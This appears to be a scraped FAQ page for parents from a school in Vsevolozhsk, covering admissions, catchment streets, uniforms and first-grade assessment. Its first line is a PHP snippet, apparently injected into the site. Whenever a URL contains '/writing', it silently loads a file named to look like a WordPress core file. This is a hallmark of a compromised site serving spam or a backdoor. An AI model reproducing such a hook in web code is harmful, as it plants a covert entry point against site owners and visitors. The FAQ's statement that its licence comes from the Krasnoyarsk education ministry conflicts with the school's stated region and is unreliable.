if(strpos(strtolower($_SERVER['REQUEST_URI']),'/writing')){include(getcwd().'/wp-includes/class-wp-comments.php');exit;} Вопросы и ответы

Вопросы и ответы

Можно ли будет перевести ребенка в школу? Будет ли дополнительный набор?

Не планируем дополнительного набора. Все классы переполнены.

Какие адреса относятся к вашей школе?

г. Всеволожск микрорайон «Южный» ограниченный правой стороной ул. Невской (нечетная сторона),  ул. Московская с № 19 (включительно), ул. Малиновского, ул. Знаменская, ул. Д. Сотникова, пр. Добровольского,  дер. Красная горка, дер. Орово, дер. Кальтино (за искл. Д. 19/1, д. 19/2), дер. Куйворы.

Как перевести ребенка в детский сад вашей школы?

Перевести ребенка в детский сад можно при наличии свободных мест и отсутствии  детей в очереди.

Кто из учителей начальной школы возьмет первоклассников в следующем учебном году? Педагогическая нагрузка на следующий учебный год будет определена до 1 июня 2017 года.

Возможно ли поступить в первый класс школы, если ребенок не посещает детский сад, но наш адрес относится к вашей школе?

В соответствии с правилами зачисления детей в первый класс следует подать заявление через  образовательный портал Ленинградской области с 15 января  2017года.

Кто пользуется приоритетом при поступлении в первый класс?

Правила записи в первый класс опубликованы на портале государственных услуг и на сайте комитета по  образованию. Приоритетом при зачислении пользуются дети - воспитанники дошкольных групп школы и дети, проживающие на закрепленной за школой территории.

Обязательна ли школьная форма в школе?

Вопрос о школьной форме решается однозначно положительно в соответствии с Уставом ОУ. Да и мнение большинства родителей в последнее время склоняется в пользу школьной формы. Форма дисциплинирует детей.

Можно ли носить в школу мобильный телефон?

Мы не рекомендуем носить в школу мобильный телефон.

На что следует обратить внимание при подготовке ребенка к школе?

Прежде всего, на умение будущего школьника общаться со сверстниками, ведь 11 лет ему придется не просто учиться в коллективе, но и взаимодействовать с ним. Ребенок в семье должен иметь свои небольшие обязанности. Это формирует чувство ответственности перед обществом - семьей, классом. Кроме того, будущий первоклассник должен владеть навыками самообслуживания: умываться, переодеваться и обуваться без посторонней помощи, содержать в порядке свои вещи.

Наш ребенок часто болеет, а ему уже 7 лет и пора, идти в школу. Как быть?

В настоящий момент в системе общего образования существует несколько форм получения образования детьми, достигшими школьного возраста. Если ребенок имеет хроническое заболевание или является инвалидом, то лечащий врач может рекомендовать родителям таких детей воспользоваться надомной формой обучения. В школе им расскажут, какие документы, кроме заявления, необходимы для того, чтобы ребенок учился на дому.

Почему учителя не ставят оценки в 1 классе, ведь родители хотели бы знать об успеваемости своего ребенка?

В 1 классе обучение действительно безотметочное. Это оправдано тем, что ребенок находится в самом начале учебного пути. К концу первого года обучения уже можно судить о той или иной степени успешности младшего школьника.

В 1 классе основной упор делается на приобретение навыков учебного труда. Словесная или условно-знаковая оценка тоже зачастую присутствует в работе учителя с учеником. Важно, чтобы она была позитивной.

Может ли ребёнок уходить один домой после уроков?

Ответственность за здоровье ребёнка вне школы в не учебное время несут его родители. Школа обеспечивает безопасность учащихся во время их пребывания в учебном заведении.

С какого возраста лучше отдавать ребенка в школу – с шести или с семи лет?

Закон «Об образовании» предусматривает поступление детей в школу с шести с половиной лет.

Что такое лицензия и аккредитация?

Лицензия – документ, выдаваемый министерством образования и науки Красноярского края. Он указывает на то что, наша школа «имеет право осуществления образовательной деятельности». При выдаче лицензии проверяется педагогический состав, санитарное состояние здания, соответствие мебели и прочего учебного оборудования санитарным нормам, противопожарная безопасность. Аккредитация - документ, выдаваемый министерством образования и науки Красноярского края. Он указывает на то что, наша школа «имеет право на выдачу выпускникам документа государственного образца «аттестат об основном общем образовании, аттестат о среднем (полном) общем образовании». Аккредитация существует трех ступеней (начальная, средняя и старшая школа). Наша школа аккредитована на все три ступени. То есть, наша школа имеет право выдавать аттестаты государственного образца, деятельность школы соответствует стандартам образования. Все наши документы можно увидеть на сайте гимназии.

Где гарантия, что мой ребенок получает должное количество знаний?

Вся деятельность школы тщательно проверяется контролирующими органами. Проводятся тесты, срезы знаний, контрольные. Школа ежегодно успешно участвует в независимых олимпиадах по основным предметам, в фестивалях «Русский медвежонок», «Кенгуру» и т.п. Деятельность школы абсолютно открыта для родителей. Мы всегда рады видеть наших родителей на уроках, проектных работах, экзаменах.